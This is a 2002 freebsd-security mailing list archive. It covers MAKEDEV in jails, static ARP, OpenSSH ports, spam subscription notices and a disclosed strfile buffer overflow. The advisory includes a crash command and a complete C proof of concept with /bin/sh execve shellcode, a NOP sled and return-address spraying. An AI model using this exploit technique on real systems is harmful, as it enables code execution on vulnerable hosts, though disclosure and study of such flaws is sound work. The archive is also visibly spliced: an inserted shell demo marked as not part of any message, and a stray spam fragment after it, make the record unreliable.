From owner-freebsd-security Sun May 5 6:15:39 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
    by hub.freebsd.org (Postfix) with SMTP id 29A9A37B408
    for ; Sun, 5 May 2002 06:15:30 -0700 (PDT)
Received: (qmail 13267 invoked by uid 0); 5 May 2002 13:15:28 -0000
Received: from p50910363.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.3.99)
    by mail.gmx.net (mp007-rz3) with SMTP; 5 May 2002 13:15:28 -0000
Received: (qmail 81429 invoked from network); 5 May 2002 10:21:35 -0000
Received: from shell.gsinet.sittig.org (192.168.11.153)
    by mail.gsinet.sittig.org with SMTP; 5 May 2002 10:21:35 -0000
Received: (from sittig@localhost)
    by shell.gsinet.sittig.org (8.11.3/8.11.3) id g45ALT881416
    for freebsd-security@FreeBSD.org; Sun, 5 May 2002 12:21:29 +0200 (CEST)
    (envelope-from sittig)
Date: Sun, 5 May 2002 12:21:29 +0200
From: Gerhard Sittig
To: freebsd-security@FreeBSD.org
Subject: Re: MAKEDEV not run from `pwd` (was: Jail() in 4.6-pre*)
Message-ID: <20020505122129.V1494@shell.gsinet.sittig.org>
Mail-Followup-To: freebsd-security@FreeBSD.org
References: <003b01c1f399$d7272fe0$0301a8c0@ec.rr.com> <20020504230024.GA46653@darkstar.doublethink.cx>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020504230024.GA46653@darkstar.doublethink.cx>; from jedgar@fxp.org on Sat, May 04, 2002 at 07:00:24PM -0400
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

[ should this discussion move to a different list?  which one? ]

On Sat, May 04, 2002 at 19:00 -0400, Chris Faulhaber wrote:
>
> [ ... no /path/to/jail/dev/MAKEDEV available ... ]
>
> This appears to be related to changes made in etc/Makefile revs.
> 1.219.2.27/1.247 where NO_MAKEDEV does not install MAKEDEV anymore
> instead of only not running 'sh MAKEDEV all'. It appears we need to
> MFC src/usr.sbin/jail/jail.8 rev. 1.24 to reflect this.
>
> For the present time, use:
>
> # make distribution DESTDIR=$D -DNO_MAKEDEV_RUN
>
> to get ${jaildir}/dev/MAKEDEV installed (or install it manually)
> then rerun:
>
> # cd $D/dev
> # sh MAKEDEV jail

There could have been another workaround: MAKEDEV creates all the
device nodes in the current directory, but it could easily be
invoked without copying it around (after all MAKEDEV will be run
in the host environment since jails don't allow to create device
nodes).

So I thought of a command like `cd $D/dev && sh /dev/MAKEDEV jail`.
But having a closer look I see MAKEDEV does some kind of recursion:

----- snip -----
[ ... ]
all)
        sh MAKEDEV std                  # standard
        sh MAKEDEV fd0 fd1              # bdev, floppy disk
[ ... ]
----- snap -----

Should this read "...; sh $0 std; ..." or "ME=$0; ...; sh ${ME}
std; ..." in case parameters get 'shift'ed?  Or more cleanly and
easier used in the .local case (untested)

----- snip -----
#!/bin/sh
MKDEVDIR=`dirname $0`
MAKEDEV=${MAKEDEV:-${MKDEVDIR}/MAKEDEV}
export MAKEDEV
[ ... ]
all)
        sh ${MAKEDEV} std
[ ... ]
local)
        umask 0                 # XXX should be elsewhere
        sh ${MAKEDEV}.local
        umask 77
        ;;
[ ... ]
----- snap -----

Should I file a conf(?) PR after making sure syntax is correct
and test cases work?  Who is using the .local hook and can tell
whether this file *has* to live next to the MAKEDEV script or
should be searched in the `pwd` first before falling back to
`dirname $0`?  And who else wants to invoke MAKEDEV without or
prior to installing it in the target directory where all the
device nodes live?  mergemaster in prebuild mode maybe (in case
the build or install steps need vn nodes or something)?

virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 6:15:44 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
    by hub.freebsd.org (Postfix) with SMTP id 410F537B409
    for ; Sun, 5 May 2002 06:15:30 -0700 (PDT)
Received: (qmail 13329 invoked by uid 0); 5 May 2002 13:15:28 -0000
Received: from p50910363.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.3.99)
    by mail.gmx.net (mp007-rz3) with SMTP; 5 May 2002 13:15:28 -0000
Received: (qmail 81440 invoked from network); 5 May 2002 10:21:42 -0000
Received: from shell.gsinet.sittig.org (192.168.11.153)
    by mail.gsinet.sittig.org with SMTP; 5 May 2002 10:21:42 -0000
Received: (from sittig@localhost)
    by shell.gsinet.sittig.org (8.11.3/8.11.3) id g45ALgG81436
    for security@FreeBSD.ORG; Sun, 5 May 2002 12:21:42 +0200 (CEST)
    (envelope-from sittig)
Date: Sun, 5 May 2002 12:21:42 +0200
From: Gerhard Sittig
To: security@FreeBSD.ORG
Subject: Re: fixed IP <-> MAC assignment (was: ipfw)
Message-ID: <20020505122142.W1494@shell.gsinet.sittig.org>
Mail-Followup-To: security@FreeBSD.ORG
References: <20020505135655.A320@grosbein.pp.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020505135655.A320@grosbein.pp.ru>; from eugen@D00015.dialonly.kemerovo.su on Sun, May 05, 2002 at 01:56:55PM +0800
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, May 05, 2002 at 13:56 +0800, Eugene Grosbein wrote:
>
> On Sat, May 04, 2002 at 08:36:52PM -0700, William J. Borskey wrote:
>
> > is it possible to write rules for ipfw using ethernet addresses instead of
> > ip addresses?
>
> You can have frozen ARP table and use ip addresses for ipfw
> to achieve the same effect. Check this out:
> http://www.FreeBSD.org/cgi/query-pr.cgi?pr=kern/36373

Do you want to followup to PR conf/23063 which has the rc.network
stuff to setup the static ARP table?  In its current form it
completely turns off ARP for the interface.  You might want to do
the sysctl operation instead.

virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

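Added example, not part of any message in this archive and not FreeBSD's
MAKEDEV: a runnable sketch of the self-invocation question raised in the
"MAKEDEV not run from `pwd`" message above. It compares recursion through a
bare script name with recursion through the script's own resolved path when
the script is started from a different (target) directory. The names
mkdev-rel, mkdev-self and run_variant are hypothetical, and empty files stand
in for device nodes so the demo runs unprivileged; the MKDEVDIR/MAKEDEV
variable names follow the proposal in that message.

```shell
#!/bin/sh
# Constructed demo: stand-in scripts create empty files instead of device nodes.

# Variant 1: recursion through a bare script name, as in the quoted excerpt.
write_relative_variant() {
    cat > "$1" <<'EOF'
#!/bin/sh
for target in "$@"; do
    case $target in
    all) sh mkdev-rel std fd0 || exit 1 ;;   # looked up in the current directory
    *)   : > "$target" ;;                    # stand-in for mknod
    esac
done
EOF
}

# Variant 2: recursion through the script's own absolute path.
# Differs from the proposal in the message by making MKDEVDIR absolute and
# by deriving the file name from $0 (assumption made for this demo).
write_self_variant() {
    cat > "$1" <<'EOF'
#!/bin/sh
MKDEVDIR=$(cd "$(dirname "$0")" && pwd) || exit 1
MAKEDEV=${MAKEDEV:-$MKDEVDIR/$(basename "$0")}   # an exported MAKEDEV wins
export MAKEDEV
for target in "$@"; do
    case $target in
    all) sh "$MAKEDEV" std fd0 || exit 1 ;;  # independent of the cwd
    *)   : > "$target" ;;                    # stand-in for mknod
    esac
done
EOF
}

# run_variant NAME: install the variant in a "host" directory, run it from a
# separate, empty target directory, and report exit status and files created.
run_variant() {
    name=$1
    work=$(mktemp -d) || return 1
    mkdir "$work/hostdev" "$work/jaildev"
    case $name in
    relative) script=$work/hostdev/mkdev-rel;  write_relative_variant "$script" ;;
    self)     script=$work/hostdev/mkdev-self; write_self_variant "$script" ;;
    *)        rm -rf "$work"; return 2 ;;
    esac
    status=0
    ( unset MAKEDEV; cd "$work/jaildev" && sh "$script" all ) 2>/dev/null || status=$?
    created=$(cd "$work/jaildev" && ls | tr '\n' ' ')
    rm -rf "$work"
    printf 'status=%s created=%s\n' "$status" "${created% }"
}

run_variant relative   # status=1 created=
run_variant self       # status=0 created=fd0 std
```

The bare-name form only works when a copy of the script sits in the current
directory, and it then runs that copy rather than the one that was started.
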
If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:40:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from hendrix.bsd.st (ADSL144-242.advancedsl.com.ar [200.63.144.242]) by hub.freebsd.org (Postfix) with SMTP id 0845537B405 for ; Sun, 5 May 2002 11:40:55 -0700 (PDT) Received: (qmail 4825 invoked from network); 5 May 2002 18:41:21 -0000 Received: from unknown (HELO depot) (10.0.0.1) by 0 with SMTP; 5 May 2002 18:41:21 -0000 Message-ID: <00c801c1f464$648fb0d0$01cca8c0@depot> From: "Juan P. Villa (DATAFULL.COM)" To: References: <3CD54236.4DA21BBE@yahoo.com> Subject: OpenSSH ports: why two? Date: Sun, 5 May 2002 15:40:55 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I would like to know what's exactly the difference between openssh-portable and openssh ports. I don't like the banner that default sshd has, and I don't like to stick with older versions (2.9 or 2.3) even if they are patched. So, I overwrite base install with openssh-portable on a regular basis, but I cannot find the sense of the other "non-portable" port. (BTW... I mean... 
if one is "portable", that means the other one isn't, right? ;-) ). Please don't take the last affirmation seriously... it's just a nonsense to stress that 2 ports for the same goal are rather confusing. Besides this, are there any reasons to stick with the default OpenSSH version included on FreeBSD source tree instead of building the port? (considering a synchronized source tree, following the respective RELENG_4_x branch, RELENG_4_5 in this case). Best Regards. Juan Pablo Villa Network Administrator Datafull.com - 4kbyte S.A. Buenos Aires - Argentina To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:14:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 1D6AD37B40A for ; Sun, 5 May 2002 13:14:15 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45KC9118767 for ; Sun, 5 May 2002 16:12:09 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id QAA03310; Sun, 5 May 2002 16:18:25 -0400 (EDT) Date: Sun, 5 May 2002 16:18:25 -0400 (EDT) Message-Id: <200205052018.QAA03310@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go!
If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:14:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 7CE9A37B406 for ; Sun, 5 May 2002 13:14:09 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45KBw118737 for ; Sun, 5 May 2002 16:11:58 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id QAA03303; Sun, 5 May 2002 16:18:13 -0400 (EDT) Date: Sun, 5 May 2002 16:18:13 -0400 (EDT) Message-Id: <200205052018.QAA03303@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. 
If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:54:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id 7BB4237B407 for ; Sun, 5 May 2002 13:54:30 -0700 (PDT) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g45KsRI62804 for ; Sun, 5 May 2002 14:54:27 -0600 (MDT) Message-ID: <3CD59C0A.306681E3@fpsn.net> Date: Sun, 05 May 2002 14:54:34 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Maybe it's time to re-evaluate the way the list rules are setup? It would appear there some some punk hell bent against this list. Possibly a subscribers only-post list? Kane Marie Fine Arts Gallery wrote: -- Colin Faber (303) 736-5160 fpsn.net, Inc. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 14:12:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from user205.net239.fl.sprint-hsd.net (user205.net239.fl.sprint-hsd.net [209.26.20.205]) by hub.freebsd.org (Postfix) with SMTP id 03BB337B4CF for ; Sun, 5 May 2002 14:11:35 -0700 (PDT) Received: (qmail 20542 invoked by uid 85); 5 May 2002 21:11:42 -0000 Received: from scorpio@drkshdw.org by scorpio.DrkShdw.org by uid 89 with qmail-scanner-1.10 (uvscan: v4.1.60/v4199. . Clear:0. Processed in 0.911075 secs); 05 May 2002 21:11:42 -0000 Received: from jeff.home.lan (HELO jeffrey) (192.168.134.2) by user205.net239.fl.sprint-hsd.net with SMTP; 5 May 2002 21:11:41 -0000 Message-ID: <00be01c1f479$75692610$0286a8c0@jeffrey> From: "Jeff Palmer" To: References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Subject: Re: You've Been Removed! Date: Sun, 5 May 2002 17:11:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

We've had to deal with this kind of stuff before. Let's not make a big issue out of this series of mails. Just ignore it, or create a procmail filter for it please. This isn't the first time, nor will it be the last time for such an event ;-)

Jeff Palmer

----- Original Message -----
From: "Colin Faber"
Cc:
Sent: Sunday, May 05, 2002 4:54 PM
Subject: Re: You've Been Removed!

> Maybe it's time to re-evaluate the way the list rules are setup? It
> would appear there some some punk hell bent against this list.
>
> Possibly a subscribers only-post list?
>
>
>
> Kane Marie Fine Arts Gallery wrote:
>
>
>
> --
> Colin Faber
> (303) 736-5160
> fpsn.net, Inc.
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 14:33:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.mx.net (uadvg134.mx.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id CA92337B412 for ; Sun, 5 May 2002 14:33:19 -0700 (PDT) Received: (qmail 1756 invoked from network); 5 May 2002 21:33:31 -0000 Received: from uadvg133.cms.usa.net (165.212.11.133) by corprelay.cms.usa.net with SMTP; 5 May 2002 21:33:31 -0000 Received: USA.NET MXFirewall, messaging filters applied; Sun, 05 May 2002 21:33:25 GMT Received: from uwdvg007.cms.usa.net [165.212.8.7] by uadvg133.cms.usa.net via mtad (CM.1201.1.04A) with ESMTP id 832geeVhV0499M33; Sun, 05 May 2002 21:33:22 GMT Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> Received: from 192.115.8.147 [192.115.8.147] by uwdvg007.cms.usa.net (USANET web-mailer CM.0402.1.01C); Sun, 05 May 2002 21:33:14 -0000 Date: Sun, 05 May 2002 22:33:14 +0100 From: ReDeeMeR To: Subject: Buffer overflow in /usr/games/strfile X-Mailer: USANET web-mailer (CM.0402.1.01C) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----NetAddressPart-00--=_eVho8912S073041adfc" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable

Hi,

Below is an advisory for a vulnerable buffer in the /usr/games/strfile binary which can be overflowed.
I emailed this information to security-officer@freebsd.org on 28/04/02 and am yet to receive a reply. The reason I am posting this so early is that it is not really a major security risk (the binary file in question is not suid), but it is a practice of bad coding so I felt it my duty to make you aware of it.

Also find attached my proof of concept code.

Thanks,
-ReDeeMeR-

--begin paste--

-=[ g0tr00t.net advisory ]=-
FreeBSD /usr/games/strfile buffer overflow
ReDeeMeR (redeemer@g0tr00t.net)
http://www.g0tr00t.net
http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt

-=[ Date discovered ]=-
24/04/02

-=[ Discovered by ]=-
ReDeeMeR (redeemer@g0tr00t.net)

-=[ Outline ]=-
FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755), thus, the security risk here is not great.

-=[ Impact ]=-
No extra privileges can be gained.

-=[ Affected ]=-
Successfully tested on FreeBSD4.5-RELEASE, suspected vulnerability on ALL FreeBSD machines which ship this software.

-=[ Vendor Status ]=-
FreeBSD (http://www.freebsd.org) contacted on 28/04/02
No reply after 7 days, so released this advisory due to the fact that this is not a major security issue.
Advisory released on 05/05/02

-=[ Description ]=-
/usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buffer overflow. The problem exists due to insufficient checking procedures on command line input. The vulnerability exists in a poorly utilised strcpy() function (found on line 310 of strfile.c) which reads from an unchecked buffer:

(void) strcpy(Outfile, *argv);

Thus, a large input (greater than allocated buffer space) will cause strfile to segfault. This in turn can lead to the execution of arbitrary commands.
A user can cause strfile to crash by inputting a string of length equal to or greater than 1069 bytes, and an input of equal to or greater than 1088 bytes in length will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory.

To reproduce this bug, execute the following command:

FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'`

-=[ Proof of concept ]=-
Proof of concept code can be located at:
http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c

If the program is successfully exploited, the terminal output should look something like this:

bash-2.05a$ uname -a
FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002 redeemer@:/usr/src/sys/compile/TOX i386
bash-2.05a$ id
uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
bash-2.05a$ ./strfilexp
ReDeeMeR's proof of concept code for /usr/games/strfile
Using return addr: 0xbfbffb0c
Buffer size: 2000
$ id
uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
$

*Notice that no extra privileges have been gained (due to strfile NOT being suid)*

-=[ Fix ]=-
A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace

(void) strcpy(Outfile, *argv);

with:

(void) strncpy(Outfile, *argv, sizeof(Outfile));

FreeBSD are yet to respond to my e-mail, but I will assume that they received it and have implemented an update in strfile.c within the FreeBSD-current branch.

-=[ Greets ]=-
Thanks to:
The Itch - For various mentoring and for hosting g0tr00t.net.
keoki - Someone to collaborate/compete with.
Chawmp - " " " " "
Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT.
--end paste-- ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; name="strfilexp.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="strfilexp.c" /* Proof of concept code for /usr/games/strfile [28/04/02] * Does not gain root shell, merely a proof of concept code * Tested on FreeBSD4.5-RELEASE * Find the advisory at * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt * * redeemer@g0tr00t.net * http://www.g0tr00t.net * http://bse.die.ms/~redeemer/legal.shtml applies to this file. */ #include #include #include #define MOO 2000 /* RET size */ #define LEN 2048 /* EGG zie */ #define NOP 0x90 /* FreeBSD execve shellcode */ char shellcode[]= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" "/bin/sh"; int main(void) { char *buff, *egg, *ptr; long *addr_pointer, addr; int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i; buff = malloc(bsize); egg = malloc(eggsize); printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n"); printf("Using return addr: \t0x%x\n", get_sp); printf("Buffer size: \t\t%d\n", bsize); ptr = buff; addr_pointer = (long *)ptr; for (i = 0; i < bsize; i += 4 ) { *(addr_pointer++) = get_sp; } ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) { *(ptr++) = NOP; } for (i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/games/strfile", "strfile", buff, NULL); return(0); } /* EOF */ ------NetAddressPart-00--=_eVho8912S073041adfc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 14:38:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mcqueen.wolfsburg.de (pns.wobline.de [212.68.68.5]) by hub.freebsd.org (Postfix) with ESMTP id A5BA437B405 for ; Sun, 5 May 2002 
14:38:34 -0700 (PDT) Received: from k6-2-300.tisys.org (ppp-224.wobline.de [212.68.69.235]) by mcqueen.wolfsburg.de (8.11.3/8.11.3/sh-2002041503) with ESMTP id g45LcEI16832; Sun, 5 May 2002 23:38:14 +0200 Received: from daemon.tisys.org (palomino-1533.tisys.org [192.168.0.3]) by k6-2-300.tisys.org (8.12.3/8.12.3) with ESMTP id g45Ldlo2080421; Sun, 5 May 2002 23:39:48 +0200 (CEST) (envelope-from nils@daemon.tisys.org) Received: (from nils@localhost) by daemon.tisys.org (8.12.3/8.12.3/Submit) id g45LcWuA008655; Sun, 5 May 2002 23:38:32 +0200 (CEST) Date: Sun, 5 May 2002 23:37:56 +0200 From: Nils Holland To: Colin Faber Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! Message-ID: <20020505233756.A8532@daemon.tisys.org> References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3CD59C0A.306681E3@fpsn.net>; from cfaber@fpsn.net on Sun, May 05, 2002 at 02:54:34PM -0600 X-Operating-System: FreeBSD palomino-1533.tisys.org 4.6-PRERELEASE FreeBSD 4.6-PRERELEASE X-Machine-Uptime: 11:24PM up 13:46, 1 user, load averages: 0.06, 0.08, 0.06 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 05, 2002 at 02:54:34PM -0600, Colin Faber stood up and spoke: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. > > Possibly a subscribers only-post list? 
This issue comes up every now and then, mostly when viruses or other spam gets sent to the FreeBSD lists (though this constantly repeating "You've been added / You've been removed) thing was the most interesting thing I saw in the last few months ;-) Anyway, my opinion has always been that *all* FreeBSD lists should be in "subscribers may only post" mode, while FreeBSD-questions should remain open for all, as many people only see that list's address mentioned in the default motd and post messages to it without wanting to be constantly signed up. However, for the other FreeBSD lists where the majority of users are not "I-only-post-when-I-have-a-problem" folks, but rather "core members" (i.e. constantly subscribed), I guess that if these list only granted posting access to subscribers, a lot of hassles could be saved. Greetings Nils -- Nils Holland Ti Systems - http://www.tisys.org Addicted to computing since 1987 High on FreeBSD since 1996 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 15:36:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from oxmail.ox.ac.uk (oxmail1.ox.ac.uk [129.67.1.2]) by hub.freebsd.org (Postfix) with ESMTP id 8E14C37B400 for ; Sun, 5 May 2002 15:36:25 -0700 (PDT) Received: from heraldgate2.oucs.ox.ac.uk ([163.1.2.50] helo=frontend2.herald.ox.ac.uk ident=exim) by oxmail.ox.ac.uk with esmtp (Exim 3.36 #1) id 174Uc4-0000Bs-01; Sun, 05 May 2002 23:36:16 +0100 Received: from dhcp1125.wadham.ox.ac.uk ([163.1.161.125] helo=piii600.wadham.ox.ac.uk) by frontend2.herald.ox.ac.uk with esmtp (Exim 3.32 #1) id 174Ubu-0003uH-00; Sun, 05 May 2002 23:36:06 +0100 X-Info-RBL1: ox.ac.uk filters email against various lists. 
X-Info-RBL2: If your replies bounce, try sending them to cperciva@sfu.ca Message-Id: <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca> X-Sender: cperciva@popserver.sfu.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Sun, 05 May 2002 23:27:49 +0100 To: ReDeeMeR , From: Colin Percival Subject: Re: Buffer overflow in /usr/games/strfile In-Reply-To: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Given that this is not a security issue -- as you point out, "no extra privileges can be gained" -- this is rather off-topic for -security; nevertheless, it is less so than discussions of mailing list sender restrictions, so I'll go ahead and respond. If you look at http://www.freebsd.org/cgi/cvsweb.cgi/src/games/fortune/strfile/strfile.c you'll see the CVS log for the file in question. At present it shows that the latest change was made six weeks ago; your change has not been incorporated. 